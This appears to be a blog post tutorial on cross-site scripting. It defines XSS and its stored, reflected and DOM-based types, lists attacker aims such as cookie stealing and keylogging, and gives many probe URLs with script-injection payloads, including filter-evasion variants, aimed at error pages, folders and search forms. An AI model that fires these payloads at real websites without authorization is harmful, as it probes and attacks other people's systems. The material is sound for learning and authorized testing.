Table Of Contents:
1. What is Cross Site Scripting?
2. Who does it hurt?
3. Types of XSS
4. What can a Hacker achieve with XSS?
5. How to find it?
1. What is Cross Site Scripting?
Cross Site Scripting is currently the most common vulnerability in the world. This is vulnerability of some host which allows anyone to inject code/scripts into the page. The injected scripts could be html tags, javascript script, vbscript scripts.
Cross Site Scripting exsistence is because of the lack of filtering engines to user inputs at websites, forms and webservers.
2. Who does it hurt?
Cross Site Scripting mostly hurt the *users* who visit the injected website. A website can contain scripts that will harm that user who visit it. Therefore when a user chooses to surf into a website, he is taking a certain amount of risk.
This is pretty obvious, but what if the user surfs into a website known/marked as safe?! this is where Cross Site Scripting fits in. So why would i click that evil link? because its a link of my bank(for example).
A big risk to the administrator is upon receiving an email with a script or link that will use the XSS vulnerability on the administrator and will steal his files/data/passwords/cookies.
At some *very rare* cases Cross Site Scripting can cause a remote compromise. This means that it will hurt the server.
3. Types of XSS Attacks
There are Three Types of XSS
• Persistent (Stored) - XSS Attack is stored on the website,s server
• Non Persistent (reflect) - XSS user has to go through a special link to be exposed
• DOM-based XSS - problem exists within the client-side script
4. What can a Hacker achieve with XSS?
Temporary Defacement can be achieved via Reflective XSS
Permanent Defacement can be achieved via Persistent XSS
Command Manuplation at Un-Authorised Area.
CSRF Token Bypass.
Cookie Stealing.
URL Sp00fed Phishing
URL Sp00fed Tr0jan Dr0pping
Cross Site Port Attacks - XSPA
Network Scanning with XSS
Keylogging and Screen Scrapping
Browser Crashing
HTTP Traffic Tunneling with XSS
and many other Malicious Activities using BEEF Framework.
5. How to find it?
This is the best part. Whenever while browsing a website you see any Input by you or the environment shown or used inside the page then it gives a sign of XSS.
First, I recommend to check the server's error reply. Many times when requesting a non-existing filename from the server
it will reply the attacker's request in quotes. So just browsing one of the following urls has a good chance to find XSS.
http://[host]/<script>alert("XSS")</script>
http://[host]/<script>alert('XSS')</script>/
http://[host]/<script>alert('XSS')</script>
http://[host]/<script>alert('XSS')</script>
http://[host]/\<script\>alert(\'XSS\')\<\/script\>
http://[host]/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl
http://[host]/perl/\<sCRIPT>alert('d')</sCRIPT>\.pl
http://[host]/\<sCRIPT>alert("d")</sCRIPT>\
http://[host]\<sCRIPT>alert('d')</sCRIPT>\
This requests should also be tested using a post request (with a '?') after the host:
http://[host]/?<script>alert("XSS")</script>
http://[host]/?<script>alert('XSS')</script>
http://[host]/?\<script\>alert(\'XSS\')\<\/script\>
http://[host]/perl/?\<sCRIPT>alert("d")</sCRIPT>\.pl
http://[host]/perl/?\<sCRIPT>alert('d')</sCRIPT>\.pl
http://[host]/?\<sCRIPT>alert("d")</sCRIPT>\
http://[host]\?<sCRIPT>alert('d')</sCRIPT>\
http://[host]/?<\73CRIP\T>alert("dsf")<\/\73CRIP\T>
http://[host]/?<\73CRIP\T>alert('dsf')<\/\73CRIP\T>
http://[host]/?</sCRIP/T>alert("dsf")<///sCRIP/T>
http://[host]/?</sCRIP/T>alert('dsf')<///sCRIP/T>
XSS inside folders:
Many webservers have default pages to folders that will look for a file and will reply our script.
For Example , and XSS I found at Novell Netware:
http://[host]/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas
But the idea lies in:
http://[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".bas
http://[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".asp
http://[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".jsp
http://[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".htm
http://[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".html
http://[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".[ext]
A common place for an XSS hole is inside a server default example files, such as:
http://<host>/cgi/example?test=<script>alert('xss')</script>
One of the most common places to find XSS in are the search files of servers, For Example:
http://[host]/search.php?searchstring=<script>alert('XSS')</script>
http://[host]/search.php?searchstring="><script>alert('XSS')</script>
http://[host]/search.php?searchstring='><script>alert('XSS')</script>
Thats all for the basic understanding of XSS
0 comments:
Post a Comment